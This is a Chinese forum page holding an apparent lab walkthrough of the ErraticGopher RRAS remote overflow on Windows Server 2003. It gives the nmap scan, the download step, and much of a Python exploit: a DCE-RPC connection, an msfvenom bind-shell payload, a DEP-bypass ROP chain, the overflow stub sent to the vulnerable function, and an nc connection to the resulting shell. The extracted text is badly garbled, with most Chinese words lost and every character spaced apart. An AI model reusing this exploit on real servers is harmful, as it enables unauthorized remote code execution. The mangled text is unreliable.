搜索

[19324] 2018-05-30_【动手实验】ErraticGopher(古怪地鼠)远程溢出漏洞

文档创建者:s7ckTeam
浏览次数:19
最后更新:2025-01-18
2018-05-30_【动手实验】ErraticGopher(古怪地鼠)远程溢出漏洞 E r r a t i c G o p h e r i   2 0 1 8 - 0 5 - 3 0   K a l i   2 0 1 7 I P 1 7 2 . 1 6 . 1 1 . 2   W i n d o w s   S e r v e r   2 0 0 3   S P 2 I P 1 7 2 . 1 6 . 1 2 . 2 :   f i l e . i c h u n q i u . c o m / b y 8 f 5 s d s W i n d o w s E r r a t i c G o p h e r   R R A S 使 P y t h o n e x p l o i t N m a p : 使 p y t h o n e x p l o i t   p y t h o n E r r a c t i c g o p h e r N S A   R R A S R o u t i n g   a n d   R o m o t e   A c c e s s 广 W i n d o w s   D C E - P R C M I B E n t r y G e t i p r t r m g r . d l l R E P S   M O V S   . s t u b S E H ( S t r u c t u r e d   E x c e p t i o n H a n d l i n g ) h a n d l e r   D E P ( D a t a   E x e c u t i o n   P r e v e n t i o n ) , s h e l l c o d e  
K a l i 使 N m a p n m a p     - s V   - P n           1 7 2 . 1 6 . 1 2 . 2   1 3 5   1 3 9   4 4 5 1 0 2 6   3 3 0 6   3 3 8 9   3 0 8 0 W i n d o w s   s e r v e r   2 0 0 3   使 使 p y t h o n   ~ / c d     ~ / 访 访   f i l e . i c h u n q i u . c o m / b y 8 f 5 s d s p y t h o n   e x p l o i t . p y     1 7 2 . 1 6 . 1 2 . 2 w i n d o w s   s h e l l
# B y   V i c t o r   P o r t a l   ( v p o r t a l )   f o r   e d u c a t i o n a l   p o r p o u s e   o n l y           # T h e   e x p l o i t   o n l y   w o r k s   i f   t a r g e t   h a s   t h e   R R A S   s e r v i c e   e n a b l e d # T e s t e d   o n   W i n d o w s   S e r v e r   2 0 0 3   S P 2 # i m p o r t   . . . p r i n t   ' [ - ] I n i t i a t i n g   c o n n e c t i o n ' #   t r a n s p o r t D C E - R P C t r a n s = t r a n s p o r t . D C E R P C T r a n s p o r t F a c t o r y ( ' n c a c n _ n p : % s [ p i p e b r o w s e r ] '   %   t a r g e t ) t r a n s . c o n n e c t ( ) e g g h u n t e r   =   " . . . " # m s f v e n o m   - a   x 8 6   - - p l a t f o r m   w i n d o w s   - p   w i n d o w s / s h e l l _ b i n d _ t c p   l p o r t = 4 4 4 4   - b   " x 0 0 "   - f   p y t h o n # b u f m e t a s p l o i t w i n d o w s s h e l l l p o r t W i n d o w s   S e r v e r 2 0 0 3 # b u f   =     " " b u f   + =   " . . . "   b u f   + =   " x c 4 x 2 5 x 3 d x e 9 " # N X   d i s a b l e   r o u t i n e   f o r   W i n d o w s   S e r v e r   2 0 0 3   S P 2 # r o p e g g h u n t e r W i n d o w s   s e r v e r   2 0 0 3 r o u t i n e r o p   =   " x 3 0 x d b x c 0 x 7 1 "   # p u s h   e s p ,   p o p   e b p ,   r e t n   w s _ 3 2 . d l l r o p   + = " . . . " r o p   + =   " x 9 0 " * 4 # r o p b u f s t u b e x p l o i t s t u b   =   " . . . "   # M a g i c   b y t e s s t u b   + =   " x 4 1 " * 2 0   +   r o p   +   " x C C " * 1 0 0   +   " w 0 0 t w 0 0 t "   +   b u f   +   " x 4 2 " * ( 1 3 1 3 - 2 0 - l e n ( r o p ) - 1 0 0 - 8 - l e n ( b u f ) )   s t u b   + =   " x 1 2 "   # M a g i c   b y t e s t u b   + =   " x 4 6 " * 5 2 2 s t u b   + = " x 0 4 x 0 0 x 0 0 x 0 0 x 0 0 x 0 0 x 0 0 x 0 0 "   # M a g i c   b y t e s # d e c . c a l l ( ) M I B E n t r y G e t i d 0 x 1 d s t u b d c e . c a l l ( 0 x 1 d ,   s t u b )   # 0 x 1 d   M I B E n t r y G e t   ( v u l n e r a b l e   f u n c t i o n ) p r i n t   " [ - ] E x p l o i t   s e n t   t o   t a r g e t   s u c c e s s f u l l y . . . " # n c W i n d o w s   S e r v e r   2 0 0 3 4 4 4 4 s h e l l o s . s y s t e m ( " n c   "   +   t a r g e t   +   "   4 4 4 4 " ) M A D ~

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理